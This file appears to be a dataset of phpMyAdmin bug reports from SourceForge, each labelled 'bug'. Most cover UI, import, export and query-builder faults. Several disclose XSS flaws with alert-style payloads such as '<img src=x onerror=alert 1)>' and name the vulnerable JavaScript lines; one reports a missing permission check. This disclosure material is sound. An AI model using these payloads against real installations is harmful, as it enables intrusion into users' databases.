I have no idea what a milestone is, so I m selecting the version where I ve encountered the bug.
Which is the version that shipped with xampp.
I also can t believe sourceforge is still using the confusing numeric labelling of priority where one is supposed to figure out whether the highest priority is 1 or 9.)
Steps to reproduce go to Home go to Export choose custom select only one database.
It s a pretty big one leave everything else as default hence exporting data and structure) go download Expected behavior should export the whole database and download it.
No reason why there should be any errors whatsoever, as I ve verified that I can do a mysqldump of the same database, so phpmyadmin should be able to do that too; anyway if anything goes wrong, you should get an error message indicating exactly what went wrong e.g.
out of memory or whatever) Observed behavior the file downloads pretty quicky and it turns out to be a 0 bytes file.
I ve tried the same with a smaller database and it works just fine.
I suspect the issue is related to the database being too big .
However, there s no valid reason why that should cause a failure.
I hope phpmyadmin is not trying to retain the full dump of the database in RAM, that would be really stupid.
Original URL https sourceforge.net p phpmyadmin bugs 4490 Original author teo8976 Found in version 4.0.4","bug"
"24444","10900","Missing validation for accessing User groups feature.
As reported by Chiripal, any logged in user has access to the User group feature.
This will open the user groups page management page from where that user can ADD, DELETE, UPDATE user groups configuration and can see users belonging to those groups and can control the tabs displayed in menu bar for those users.
That is it has access to pma user groups table of phpmyadmin configuration storage.
That user can limit access for other users with higher privileges than him) by removing displayed tabs from the user group which can also include Users tab.
Original URL https sourceforge.net p phpmyadmin bugs 4491 Original author lem9 Found in version 4.2.5","bug"
"24444","10901","Issues with index dialog while creating a table.
Following issues are there in the index dialog shown while creating a table It does not show additional options It has the button to add more columns which does not make sense in this context, and clicking it throws errors.
Original URL https sourceforge.net p phpmyadmin bugs 4812 Original author madhuracj Found in version 4.4.0","bug"
"24444","10902","Overlap in navigation panel.
From Chirayu I see a problem with Recent Favorites drop list which is just above navigation tree.
The items in Recent Favorites list are getting overlapped with navigation tree items.
Original URL https sourceforge.net p phpmyadmin bugs 4494 Original author lem9 Found in version 4.2.6","bug"
"24444","10903","Comment lines in multiquery.
My version number is 4.2.3.
Inserting multiquery commands with comment lines fails.
This multiquerycommand works SET d = 32267; SELECT d; but not this SET d = 32267; SELECT d; Original URL https sourceforge.net p phpmyadmin bugs 4495 Original author stenohman Found in version 4.2.3","bug"
"24444","10904","Blank white page.
I just upgraded to v4.2.6, but the page don t render .
I can se all HTML code in the pagesource, but the page is white blank.
Testad with both latest Google Chrome and Internet Explorer.)
Original URL https sourceforge.net p phpmyadmin bugs 4497 Original author guldstrand Found in version 4.2.6","bug"
"24444","10905","Tiny localization issue in <database> > Operations window.
In the <database> > Operations window, the after Collation should be included in the text itself, as done for Rename database to and Copy database to or completely removed, as in Create table or Remove table .
The 2nd option looks more logical to me.
This will help translation in French, there is a space before the ) Moreover, I don t really see the point of having a <label> for this title.
Original URL https sourceforge.net p phpmyadmin bugs 4816 Original author tititou Found in version 4.3.7","bug"
"24444","10906","PMA 4.2.x and HHVM.
HHVM 3.2 and PHPMyAdmin 4.2.x are not compatible because of data type coercion is not implemented in HHVM yet.
Here is a small patch against PMA 4.2.6 that makes it work in HHVM and does not influence vanilla PHP.
libraries dbi DBIMysqli.class.php.original 2014 07 24 18 14 14.168366259 0200 libraries dbi DBIMysqli.class.php 2014 07 24 17 20 07.684482379 0200 135,7 135,7 if server) { server port = empty server[ port ])) ?
false ?
null int) server[ port ]; server socket = empty server[ socket ])) ?
145,7 145,7 server[ host ]; } else { server port = empty cfg[ Server ][ port ])) ?
false ?
null int) cfg[ Server ][ port ]; server socket = empty cfg[ Server ][ socket ])) ?
null Original URL https sourceforge.net p phpmyadmin bugs 4498 Original author sharx1976 Found in version 4.2.6","bug"
"24444","10907","Invalid links to dev.mysql.com.
Invalid links to dev.mysql.com in variables page server variables.php), server status variables server status variables.php) and different pages, where used help.
In particular Invalid Hashtags.
Original URL https sourceforge.net p phpmyadmin bugs 4820 Original author greenpeas26 Found in version 4.3.12","bug"
"24444","10908","Uncaught TypeError Cannot call method substr of undefined.
From Marc Delisle.
To reproduce visit Server > Users pick a letter initial) having just one user delete this user add a new user After adding the user, the code in appendNewUser ) is not able to initialize curr first row, so computing a value for first row initial fails.
This report is related to user submitted report [ 3033] https reports.phpmyadmin.net reports view 3033) on the phpmyadmin error reporting server.
Original URL https sourceforge.net p phpmyadmin bugs 4499 Original author phpmyadmin bot Found in version 4.2.6","bug"
"24444","10909","mysql doc template is not defined.
From Marc Delisle.
Frequent in reports.phpmyadmin.net.
This report is related to user submitted report [ 2958] https reports.phpmyadmin.net reports view 2958) on the phpmyadmin error reporting server.
Original URL https sourceforge.net p phpmyadmin bugs 4500 Original author phpmyadmin bot Found in version 4.2.6","bug"
"24444","10910","XSS in table browse page.
Steps In table browse page, try to delete a row from a table where either the database name, table name or a column name is crafted <img src=x onerror=alert 1)>) Affected versions 4.0.x, 4.1.x, 4.2.x Problematic line sql.js L122 in QA 4 2) var question = .sprintf PMA messages.strDoYouReally, this).closest td ).find div ).text )); Original URL https sourceforge.net p phpmyadmin bugs 4501 Original author madhuracj Found in version 4.0.10","bug"
"24444","10911","Self XSS in enum value editor.
Steps In table structure page, add a new column, insert <img src=x onerror=alert 1)> as column name, chose enum as column type and click on Edit ENUM SET values link.
Affected versions 4.0.x, 4.1.x, 4.2.x Problematic line function.js L2693 in QA 4 2) title = PMA messages.enum columnVals.replace s , decodeURIComponent colname) ); Original URL https sourceforge.net p phpmyadmin bugs 4502 Original author madhuracj Found in version 4.0.10","bug"
"24444","10912","XSS in view operations page.
Steps Create a view with the name <img src=x onerror=alert 1)> , go to operations page and try to drop it.
Affected versions 4.1.x, 4.2.x Problematic line function.js L3558 in QA 4 2) question = .sprintf PMA messages.strDoYouReally, DROP VIEW PMA commonParams.get table )); Original URL https sourceforge.net p phpmyadmin bugs 4505 Original author madhuracj Found in version 4.1.14","bug"
"24444","10913","Datepicker missing when changing number of rows on Insert page.
At the bottom of the Insert page is a dropdown for Continue insertion with rows when using that dropdown to change the number of rows, the datepicker does not appear.
To reproduce, have a table with a date , datetime , or timestamp column.
Go to the Insert page and see that the picker is available.
Go to the dropdown and change to any other number of rows.
Now look and see the picker is missing.
Note that time columns do behave as expected; the picker is available in every case.
Original URL https sourceforge.net p phpmyadmin bugs 4825 Original author ibennetch Found in version Latest Git","bug"
"24444","10914","Suphp phpmyadmion bug.
i use ubuntu 14.04 install anythink from default repo apache, php , mysql, phpmyadmin and ... suphp when istal it phpmyadmin stop work.
i found problematic fix http ubuntuforums.org showthread.php?t=1753871 but it dont work.
Please repair it and allow to use phpmyadmin for this module.
Original URL https sourceforge.net p phpmyadmin bugs 4507 Original author grek pg Found in version 3.3.7","bug"
"24444","10915","SQL Query Tab hangs since minor locale issue.
In file libraries plugin interface.lib.php, lines 27 to 30 are using strtolower but since strtolower does not work in Turkish mb strtolower should be used.
I m uploading the patch I used.
Original URL https sourceforge.net p phpmyadmin bugs 4508 Original author ongun kanat Found in version 4.2.7 Attachment http sourceforge.net p phpmyadmin bugs 4508 attachment plugin interface.lib.php.patch","bug"
"24444","10916","Two inline edit windows.
When using inline edit to modify a TEXT column, if there are more than 60 characters present you get two edit windows; one is the standard inline edit and the second is the larger window that pops up below designed for larger portions of text.
See the attachment for an example.
We should disable the smaller window in this case.
Original URL https sourceforge.net p phpmyadmin bugs 4826 Original author ibennetch Found in version Latest Git Attachment http sourceforge.net p phpmyadmin bugs 4826 attachment Screen 20Shot 202015 03 31 20at 209.42.07 20PM.png","bug"
"24444","10917","QBE doesn t manage FK.
When there are two tables in QBE with a FK, QBE generates following query SELECT `master`.
, `slave`.
FROM `slave`, `master` While it should generate SELECT `master`.
, `slave`.
FROM `slave` LEFT JOIN `qbetest`.`master` ON `slave`.`master id` = `master`.`id` ; Tables to reproduce CREATE TABLE IF NOT EXISTS `master` `id` int 11) NOT NULL, `data` text NOT NULL, PRIMARY KEY `id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; CREATE TABLE IF NOT EXISTS `slave` `id` int 11) NOT NULL, `master id` int 11) NOT NULL, `data` text NOT NULL, PRIMARY KEY `id`), KEY `master id` `master id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; ALTER TABLE `slave` ADD CONSTRAINT `slave ibfk 1` FOREIGN KEY `master id`) REFERENCES `master` `id`); To reproduce just do a QBE and select master.
, slave.
and check display for all of these.
Original URL https sourceforge.net p phpmyadmin bugs 4509 Original author tithugues Found in version 4.2.7","bug"
"24444","10918","QBE generates wrong query.
When there are three tables in QBE, two of them have relations and one does not, QBE generates following query SELECT `master`.
, `slave`.
FROM `master` LEFT JOIN `qbetest`.`slave` ON `master`.`id` = `slave`.`master id` While it should generate SELECT `extra`.
, `master`.
, `slave`.
FROM `extra`, `slave` LEFT JOIN `qbetest`.`master` ON `slave`.`master id` = `master`.`id` ; Tables to reproduce CREATE TABLE IF NOT EXISTS `extra` `id` int 11) NOT NULL, `data` text NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8; CREATE TABLE IF NOT EXISTS `master` `id` int 11) NOT NULL, `data` text NOT NULL, PRIMARY KEY `id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; CREATE TABLE IF NOT EXISTS `slave` `id` int 11) NOT NULL, `master id` int 11) NOT NULL, `data` text NOT NULL, PRIMARY KEY `id`), KEY `master id` `master id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; ALTER TABLE `slave` ADD CONSTRAINT `slave ibfk 1` FOREIGN KEY `master id`) REFERENCES `master` `id`); To reproduce just do a QBE and select extra.
, master.
, slave.
and check display for all of these.
Original URL https sourceforge.net p phpmyadmin bugs 4510 Original author tithugues Found in version 4.4.0","bug"
"24444","10919","ForceSSL Redirect Check.
Forgive me if this is just a lack of understanding, I usually make this change when I install new versions and I can t see much online to give me the reasoning for why it works that way it does.
The check HTTPS connection in libraries common.inc.php uses is https to check whether a redirect should be made if ForceSSL is turned on.
From is https This function checks if the https protocol is used in the PmaAbsoluteUri which as I understand it is the configuration value which is will always contain https if set that way.
Should it not instead use detectHttps to check if the active connection is secure to know whether a redirect is required?
Thanks.
Original URL https sourceforge.net p phpmyadmin bugs 4512 Original author robryan Found in version 4.4.0","bug"
"24444","10920","controluser cannot connect to MySQL using REQUIRE SSL.
Running 4.2.6.
When I set the GRANT option REQUIRE SSL on the controluser is fails to connect even though I have cfg[ Servers ][ i][ ssl ] = true; Removing the GRANT option REQUIRE SSL returns pmacontroluser back to working.
Original URL https sourceforge.net p phpmyadmin bugs 4514 Original author justink101 Found in version 4.2.6","bug"
"24444","10921","up down control in the display view.
Not exactly a bug, but putting an up down control in the entry display for all ints is a BAD idea.
When one is editing some text items, eg, the mouse cursor can hover on the up down control and change it without the user knowing it.
Original URL https sourceforge.net p phpmyadmin bugs 4515 Original author pierredu Found in version 3.3.7","bug"
"24444","10922","Odd export behavior.
Hi, I found an odd thing in the exporter.
If you have two tables named similarly, the exporter can pickup the wrong auto increment value.
So for example, create two tables named a2a a a and put a single field in each as int, primary index, auto increment.
Add some records to a2a.
Now export a a.
Auto increment will be from a2a not a a. I ve tried this on various versions of phpmyadmin and it seems to be consistent.
Most recent version tried was phpMyAdmin SQL Dump version 4.2.7 http www.phpmyadmin.net Host localhost Generation Time Aug 14, 2014 at 09 13 AM Server version 5.5.21 PHP Version 5.3.27 My workaround is to just rename the first table so it doesn t differ by the single character but thought y all might want to hear about it.
Cheers, Roy Flynt Original URL https sourceforge.net p phpmyadmin bugs 4516 Original author rflynt3 Found in version 4.2.7","bug"
"24444","10923","CSS and Javascript are not compressed.
Original URL https sourceforge.net p phpmyadmin bugs 4833 Original author lem9 Found in version 4.4.1","bug"
"24444","10924","XSS in relation view.
Steps 1) Go to Relation view of any table.
2) Create a Foreign key constraint.
3) When it asks for Constraint name , enter the following ><script>alert seep );< script><input type= hidden value= 4) Click save.
You will get a pop up.
I think its because the constraint name variable in concatenation) in tbl realtion.lib.php file at line number 557 is not escaped.
Original URL https sourceforge.net p phpmyadmin bugs 4517 Original author madhuracj Found in version 4.0.10","bug"
"24444","10925","tbl create PMA hideShowConnection not called after submit num fields.
In tbl create.php, field Connection shows up after adding a field by Add columns top of screen) storage engine = MyISAM.
Because this field seems to be required , it can be troublesome.
After selecting a storage engine left of it), it disappears.
I tracked down the affected code parts functions.js r2658 2683 event handler for submit num fields r2856 2861 AJAX.registerTeardown functions.js , [...] removes listeners r2866 2884 AJAX.registerOnload functions.js [...] sets listener PMA hideShowConnection for tbl storage engine selectbox r2891 2907 function PMA hideShowConnection engine selector) [...] event handler for Connection field show hide I think inserting in event handler submit num fields is the solution for it.
Nice spot is after PMA verifyColumnsProperties ) method.
Something like PMA hideShowConnection .create table form select[name=tbl storage engine] )); Original URL https sourceforge.net p phpmyadmin bugs 4835 Original author alexkamp Found in version 4.4.0","bug"
"24444","10926","Export to SQL CREATE TABLE option AUTO INCREMENT ignored.
Problem does also exists version 4.2.7.1) I want a SQL export of table structure only without having the AUTO INCREMENT .
In older versions this was no problem, but since SQL table creation has been split into fields, indices and auto increments, the AUTO INCREMENT queries are attached always at the end of the export.
Checkbox AUTO INCREMENT name sql auto increment ) under CREATE TABLE options is now ignored.
In ExportSQL.class.php, some checkes are to name sql auto increments .
Maybe the problem originates there.
Original URL https sourceforge.net p phpmyadmin bugs 4518 Original author alexkamp Found in version 4.2.7","bug"
"24444","10927","Uncaught TypeError Cannot read property success of null.
filename ajax.js; line 237; func responseHandler; See https reports.phpmyadmin.net reports view 3154 Original URL https sourceforge.net p phpmyadmin bugs 4519 Original author lem9 Found in version 4.2.7","bug"
"24444","10928","Initially allowed chart types do not match selected data.
Fixed with https github.com phpmyadmin phpmyadmin commit fae385866931b72a15fcabc2ef805bd629ada2a1 Original URL https sourceforge.net p phpmyadmin bugs 4521 Original author madhuracj Found in version 4.2.7","bug"
"24444","10929","Duplicate column names while assigning index.
I am assigning index for cus id.
But, in original table there is only 1 id field.
Why is it showing 2 ids?
Original URL https sourceforge.net p phpmyadmin bugs 4522 Original author rnkhouse Found in version 4.2.7 Attachment http sourceforge.net p phpmyadmin bugs 4522 attachment pic.png","bug"
"24444","10930","tbl change.js insert as new row submit type on multiple selected records does not set all AUTO INCREMENTs to 0 value.
I found a small issue in PMA.
In case you want to edit multiple records and inserting them as new, only the first record AUTO INCREMENT value is set to 0.
How to reproduce Choose a table which as an AUTO INCREMENT index and more dan one record Browse explore contents of it Check at least two records Below all shown records, click the Pencil Change to edit the selected items.
In the actions panel you can choose to Save and Go back .
After selecting Insert as new row in submit type) only the first record AUTO INCREMENT value is to 0.
In my opinion AUTO INCREMENT field for both records should be 0 .
File tbl change.js sets the event for changing submit type row 313 328).
Only the first occurrence of insertRowTable will be processed.
For illustration I attached a diff file which shows my changes to make it work.
Then you can merge it into PMA style of coding.)
Original URL https sourceforge.net p phpmyadmin bugs 4523 Original author alexkamp Found in version 4.2.7 Attachment http sourceforge.net p phpmyadmin bugs 4523 attachment tbl change diff.js","bug"
"24444","10931","Allow for direct selection of 0 on the user overview page.
The users overview page allows for listed navigation by its first character numbers 1 9 and letters A Z).
However 0 is missing from this navigation.
It will be nice to also have direct access to users starting with a 0 instead of having to click on show all.
I am using phpMyAdmin 4.2.7.1, PHP 5.4.4, MySQL 5.5.38 on a Debian 7.6 with Fx 31.0 Original URL https sourceforge.net p phpmyadmin bugs 4524 Original author kghbln Found in version 4.2.7","bug"
"24444","10932","Fatal error Cannot redeclare class Application Octetstream Download.
When trying to add columns to a table via the Structure tab, I get the following error after submitting the initial form Fatal error Cannot redeclare class Application Octetstream Download in \phpmyadmin\libraries\plugins\transformations\Application Octetstream Download.class.php on line 42 Original URL https sourceforge.net p phpmyadmin bugs 4525 Original author benjamwelker Found in version Latest Git","bug"
"24444","10933","PhpMyAdmin not generating the proper update query..
So I just recently installed PMA on a server of mine, and I imported a database from an other PMA server.
When trying to change the value of a column from 1 to 0 instead of that value being changed it changes 3 different columns in the row instead Most often it sets them to ).
I am very clueless why it ignores the change I made, and even more curious why it changes other columns that shouldn t be changed.
I have used PMA on and off for many many years, and never seen anything like this, any help on this matter would be very much appreciated.
I believe this to be some kind of bug, but I am not sure how to proceed to further investigate whats wrong.
Original URL https sourceforge.net p phpmyadmin bugs 4526 Original author zampa86 Found in version 4.2.7","bug"
"24444","10934","Importing ODS files with column names having trailing spaces fails.
When trying to import an ODS OpenDocument Spreadsheet) file with one or more spaces at the end of one or more column names, the import fails because phpMyAdmin tries to create a table with spaces at the end of the names of the columns of the SQL tables.
Steps to reproduce 1.
Create an ODS with a) spac es) trailing the a column name s), or use the one attached.
2.
Go to [the Import page for a database] http demo.phpmyadmin.net master config db import.php?db=world token= PMAURL 0 db import.php?db=world table= server=2).
3.
Check the option Column names in first row .
4.
Upload the spreadsheet.
Expected result The spreadsheet gets imported into the database correctly.
What I see instead phpMyAdmin tries to create a table with spaces at the end of column names, resulting in the following error >Error > >SQL query > CREATE TABLE IF NOT EXISTS `world`.`Tab 1` `At the end of this cell is a space ` int 1), `At the end of this cell there is no space` decimal 4,2), `There is no space at the end of this cell either` int 4)) DEFAULT CHARACTER SET utf8 COLLATE utf8 general ci; > >MySQL reports ` 1166 Incorrect column name At the end of this cell is a space ` I ve tested this both with my local phpMyAdmin 4.1.12 and with the version running at demo.phpmyadmin.net, `RELEASE 4 2 7 1 2487 g10c0752`.
Original URL https sourceforge.net p phpmyadmin bugs 4527 Original author a012345012345 Found in version 4.2.7 Attachment http sourceforge.net p phpmyadmin bugs 4527 attachment ODS 20with 20spaces 20after 20column 20names.ods","bug"
"24444","10935","Can t import dump via SQL field.
I tried to import a totally valid dump by pasting in the SQL textfield, and it throws this error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near CREATE TABLE IF NOT EXISTS `test` `id` int 11) NOT NULL, `test` text NOT N at line 12 Importing from file works.
Also tested on http demo.phpmyadmin.net master phpMyAdmin SQL Dump version 4.3.0 dev http www.phpmyadmin.net Host localhost Erstellungszeit 10.
Sep 2014 um 15 01 Server Version 5.5.38 0ubuntu0.14.04.1 PHP Version 5.5.9 1ubuntu4.4 SET SQL MODE = NO AUTO VALUE ON ZERO ; SET time zone = 00 00 ; Datenbank `test` Tabellenstruktur fxc3xbcr Tabelle `test` DROP TABLE IF EXISTS `test`; CREATE TABLE IF NOT EXISTS `test` `id` int 11) NOT NULL, `test` text NOT NULL ) ENGINE=InnoDB AUTO INCREMENT=3 DEFAULT CHARSET=utf8; Daten fxc3xbcr Tabelle `test` INSERT INTO `test` `id`, `test`) VALUES 1, asdasdasdas\r\nasdasdasd adsadadsa\r\nIt s broken ); Indexes for dumped tables Indexes for table `test` ALTER TABLE `test` ADD PRIMARY KEY `id`); AUTO INCREMENT for dumped tables AUTO INCREMENT for table `test` ALTER TABLE `test` MODIFY `id` int 11) NOT NULL AUTO INCREMENT,AUTO INCREMENT=3; Original URL https sourceforge.net p phpmyadmin bugs 4528 Original author rm km it Found in version Latest Git","bug"
"24444","10936","Undefined index pos.
1.)
Open a database.
2.)
Select one or more tables.
3.)
Choose action Empty and clicok on Yes .
4.)
Scroll to the end of page and see this traceback Notice in .
libraries mult submits.lib.php 279 Undefined index pos Backtrace .
libraries mult submits.inc.php 200 PMA getQueryStrFromSelected string empty tbl , array, string <censored database name> , string , array, NULL, NULL, NULL, ) .
db structure.php 134 include .
libraries mult submits.inc.php) Original URL https sourceforge.net p phpmyadmin bugs 4529 Original author azurit Found in version 4.2.8","bug"
"24444","10937","DOM based XSS that results in a CSRF.
Originally reported by Olivier Beg By tricking a logged in user to click on a crafted URL, it is possible to perform a remote code execution due to an XSS vulnerability in micro history feature.
Original URL https sourceforge.net p phpmyadmin bugs 4530 Original author madhuracj Found in version 4.0.0","bug"
"24444","10938","trigger sql with delimiters maxes out cpu resources.
after creating tables with CREATE TABLE test1 a1 INT); CREATE TABLE test2 a2 INT); CREATE TABLE test3 a3 INT NOT NULL AUTO INCREMENT PRIMARY KEY); CREATE TABLE test4 a4 INT NOT NULL AUTO INCREMENT PRIMARY KEY, b4 INT DEFAULT 0 ); and running the following sql query directly delimiter | CREATE TRIGGER testref BEFORE INSERT ON test1 FOR EACH ROW BEGIN INSERT INTO test2 SET a2 = NEW.a1; DELETE FROM test3 WHERE a3 = NEW.a1; UPDATE test4 SET b4 = b4 1 WHERE a4 = NEW.a1; END; | delimiter ; our apache webserver maxes out on cpu usage until it is exited which results in an internal server error.
the same tests on the demo interface latest stable latest git) e.g.
http demo.phpmyadmin.net STABLE results in import.php returning <html> <head><title>504 Gateway Time out< title>< head> <body bgcolor= white > <center><h1>504 Gateway Time out< h1>< center> <hr><center>nginx 1.2.1< center> < body> < html> after a few seconds tested locally with versions 4.4.1.1 going downwards until 4.3.8. bevhaviour was always the same 100 cpu, internal server error from apache) Original URL https sourceforge.net p phpmyadmin bugs 4848 Original author martinherndl Found in version Latest Git","bug"
"24444","10939","Functions accessed from navigation do not load on ajax dialog.
Original URL https sourceforge.net p phpmyadmin bugs 4849 Original author madhuracj Found in version 4.4.0","bug"
"24444","10940","Relation view on 1920.
Relation view when screen resolution 1920x1080 Original URL https sourceforge.net p phpmyadmin bugs 4850 Original author greenpeas26 Found in version 4.4.1 Attachment http sourceforge.net p phpmyadmin bugs 4850 attachment pma1920.png","bug"
"24444","10941","Import SQL file in windows 1251 charcode do not work.
Importing file in windows 1251 cp1251) character coding is wrong.
Original URL https sourceforge.net p phpmyadmin bugs 4531 Original author atomsite Found in version 3.5.1","bug"
"24444","10942","After logging in, first request is abnormally slow on master.
I don t know if this is just specific to my system but to test on master 1.
Do git checkout 4960f20 parent commit of bad commit 2.
After logging in, quickly make a click for ex try opening a recent table) 3.
Note it was fast.
4.
Do git checkout 9b77d746aba7ded13aa68f98ac4b5840f2d438 5.
Repeat step 2 afresh.
6.
Now this first request takes time to load.
git bisect tells 9b77d746aba7ded13aa68f98ac4b5840f2d438f8 is the first bad commit commit 9b77d746aba7ded13aa68f98ac4b5840f2d438f8 Author Hugues Peccatte <hugues.peccatte gmail.com> Date Fri Aug 15 18 19 20 2014 0200 Mass modifications to use PMA String.
Signed off by Hugues Peccatte <hugues.peccatte gmail.com> Original URL https sourceforge.net p phpmyadmin bugs 4532 Original author atul5 Found in version Latest Git","bug"
"24444","10943","A script on the page is running slowly.
I recently had the problem that ob each change of page Firefox would tell me that a script is running slowly and if I would like to stop or debug it.
Debugging would stop at rather random positions, but one time it was some JS string function that was applied to a SQL that was in my pma history.
I had around 8000 entries in the history and after emptying the table it became better.
Sorry for the vague description, but since my history is now empty, I can t reproduce it anymore.
Maybe this is related to bug 4532 Original URL https sourceforge.net p phpmyadmin bugs 4534 Original author rm km it Found in version Latest Git","bug"
"24444","10944","Loads of Warnings Notices in PMA getServerSlaveStatus on replication slave.
For each replicated table a lot of warnings notices a thrown, see http pastebin.com 3vzZcj97 Original URL https sourceforge.net p phpmyadmin bugs 4535 Original author rm km it Found in version Latest Git","bug"
"24444","10945","master import problem PMA String).
Since https github.com phpmyadmin phpmyadmin commit 9b77d746aba importing a .sql file has slowed down.
This means that I cannot import the full employees table from the sample MySQL employees database.
A test with a subset of this table attached here) works but is very slow 60 seconds).
By comparison, with QA 4 2 it takes 4 seconds.
Original URL https sourceforge.net p phpmyadmin bugs 4536 Original author lem9 Found in version Latest Git Attachment http sourceforge.net p phpmyadmin bugs 4536 attachment employees 10000.zip","bug"
"24444","10946","BLOB inline view JPG column transformation does not work for anything except simple queries.
This was discovered in 4.1.12.
I did look at latest git rev and didn t see any code changes around this.
I have tested this with JPG transformations but this likely impacts other transformations as well.
Bug When a SQL query involves more than one table, transformations such as loading a thumbnail in from a BLOB do not work.
Replication 1.
Create a BLOB column filled with JPEG images.
2.
Ensure the column transformation is setup in Structure tab) to show inline the JPEG.
3.
Browse the table, the thumbnail will show, as expected 4.
Change the query to be something like sql SELECT FROM table1 t1 LEFT JOIN table2 t2 ON t2.id = t1.table2 id The image fails to load.
Investigation Investigation has led to the following discoveries The params passed to the transformation wrapper.php by DisplayResults.class.php are incorrect The unique clause where clause generated by PMA Util getUniqueCondition ) includes id s from both tables, but only the one table is passed into transformation wrapper.php so the query fails.
If the thumbnail field existed on a joined table, the table passed in the url parameters to transformation wrapper.php would be the wrong table.
Perhaps the table passed should be the table that the field belongs to meta >table), same for the db, but that s less of a likely error scenario.
in DisplayResults getRowValues ) ) php url params = array db => meta >db, table => meta >table, where clause => where clause, transform key => meta >name, ); If only one table is passed to transformation wrapper.php, the where clause would need to be recalculated just for the field s table instead of relying on the one calculated for the row.
This only works if that table has a unique field, otherwise you d have to rely on the WHERE in the current query ie.
the existing where clause) I noticed PMA Util getUniqueCondition ) is generating some very strange where clauses if the query is a bit complex.
For example sql select s.mark for deletion,`s`.`thumbnail`,`s`.`id`,`s`.`image id`,`s`.`filename` ,`i`.`camera`,`i`.`datetimetaken`,`s`.`modifieddatetime`,`s`.`filesize`,`s`.`sourcedirectory`,`src`.`drivedescription`,`src`.`driveletter`,`src`.`systemname`,`src`.`driveserialnumber`,`src`.`drivevolumename` from `source files` `s`, `images` `i`, `sources` `src` WHERE `i`.`id` = `s`.`image id` AND `s`.`source id` = `src`.`id` AND i.id in 315,135) order by `s`.`image id` Includes ALL of the selected fields in where clause even though only the id columns would be required s.id is unique to the view, but if a column is isolated it would be unique to the id of it s table s pk).
All 3 tables here have unique primary key columns, shouldn t those be used?
Views do not seem to support transformations on the columns.
Solving this would be required in order to solve that.
Perhaps the same criteria for an updatable view needs to be met in order for a transformation to be visible?
That guarantees there is a unique way to select update delete that row.
http dev.mysql.com doc refman 5.6 en view updatability.html Ideas PMA Util getUniqueCondition ) could return all tables that exist in the where clause returned as well.
This could then be used by the transformation wrapper to generate a valid SQL query no matter what table the thumbnail is coming from.
Or, calculate a where clause for each table selected from in the query to use for transformation columns in those rows.
Original URL https sourceforge.net p phpmyadmin bugs 4537 Original author chreds Found in version 4.1.12","bug"
"24444","10947","Column headers move when scrolling, fix included in report..
There is a bug in line 586 of the file sql.js in the JS directory in PHPMyAdmin.
The line return originalColumns.eq i).width ); needs changing to return Math.floor originalColumns.eq i).width )) 1; Without this the column headers get moved all over the place when you scroll through tables with many columns and large amounts of information in both the column name and data.
It has been like this for many versions.
4.2.8.1 also still has this bug.
Support request open in this location, also showing example of the bug happening, namely here http b2b.resource ps.co.uk phpmyadmin phpmabug.jpg along with the fix.
http stackoverflow.com questions 24635110 phpmyadmin column headers move in table when you scroll If this quick and simple code change could be made that would be excellent.
Thanks.
Original URL https sourceforge.net p phpmyadmin bugs 4538 Original author usrhlp Found in version 4.2.8","bug"
"24444","10948","Blank white page running from the STABLE branch).
When running version 4.2.8.1 in Chrome and Firefox, I am getting a blank page.
Upon reviewing the page source, I see the following in the header <style id= cfs style >html{display none;}< style> I have rolled back to 4.2.8 and it works fine.
I did go to http demo.phpmyadmin.net STABLE index.php and am experiencing the same thing, so it s not specific to my install.
Original URL https sourceforge.net p phpmyadmin bugs 4539 Original author jdavidbakr Found in version 4.2.8","bug"
"24444","10949","Syntax error for table create having a auto increment column but not checked as primary key.
Hi When we try to create a new table with a column that has checked auto increment but has not been set to be primary key, we get the Error popup saying You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ) ) ENGINE = InnoDB at line 1 preview sql shows the query formed as CREATE TABLE `ffs`.`memTable` `id` INT 11) NOT NULL AUTO INCREMENT , PRIMARY KEY ) ) ENGINE = InnoDB; Original URL https sourceforge.net p phpmyadmin bugs 4540 Original author smita786 Found in version Latest Git","bug"
"24444","10950","Create Table can t change index dropdown value.
Hi While creating a table, if at first we select an index for any column then try to change it to some another index type using drop down it doesn t work.
Add index model dialog comes up with readonly previously selected index type.
To reproduce go on table create page.
for any column, select an index type.
try to change the selected index.
Original URL https sourceforge.net p phpmyadmin bugs 4541 Original author smita786 Found in version Latest Git","bug"
"24444","10951","Misaligned Inline edit field.
The edit field appears to be misaligned somehow.
Original URL https sourceforge.net p phpmyadmin bugs 4862 Original author olafvdspek Found in version 4.4.2 Attachment http sourceforge.net p phpmyadmin bugs 4862 attachment pma2.PNG","bug"
"24444","10952","Tab key in column name not shown.
The Tab Stop is not shown in a column name in the structure view of a table.
If the column name is edited the tab stop is visible.
Very hard to find error.
Eg Column name [tab]xyz Shown name in structural overview xyz try INSERT INTO foo xyz) VALUES 1 ) will bring you back the error that the column xyz is not in the field list.
Original URL https sourceforge.net p phpmyadmin bugs 4542 Original author karl dietmann Found in version 4.2.9","bug"
"24444","10953","ok 4.2.10) Trying to favorite table while browser localStorage is disabled throws JS error.
Hi If the browser localStorage is disabled and we try to favourite a table, JS error is thrown TypeError window.localStorage is null Original URL https sourceforge.net p phpmyadmin bugs 4545 Original author smita786 Found in version 4.2.9","bug"
"24444","10954","signon auth with use trans sid results in damaged json.
If you use phpMyAdmin with session.use trans sid = 1 in php.ini and auth type= signon you can t fold out the list of databases in the left menu.
Error in red box Error in Processing Request Error code 200 Error text OK Yes...the JSON will be generated, but there will be also inserted a part for phpMyAdmin and the sessionId col 136) and its quotes ) are NOT escaped.
That s why the status is 200 and OK , but the JSON itself is broken.
I think you should implement a special check for this server configuration and inform the user about it.
Further I have deactivates the use of Ajax in phpMyAdmin...but that doesn t work, too.
Stefan Original URL https sourceforge.net p phpmyadmin bugs 4546 Original author froemken Found in version 4.2.9","bug"
"24444","10955","Micro history does not work in Users page.
Go on to edit privileges for a user and try to go back.
Content of the page does not change.
Original URL https sourceforge.net p phpmyadmin bugs 4547 Original author madhuracj Found in version 4.2.0","bug"
"24444","10956","Inline editing a field converts tab to spaces.
I am in the table view.
A record contains a TAB character in a field.
If I double click on this field to inline edit it the TAB is transformed in FOUR SPACES.
4 whitespace characters).
When confirming this with enter) phpmyadmin actually stores into the database the spaces instead ob tab.
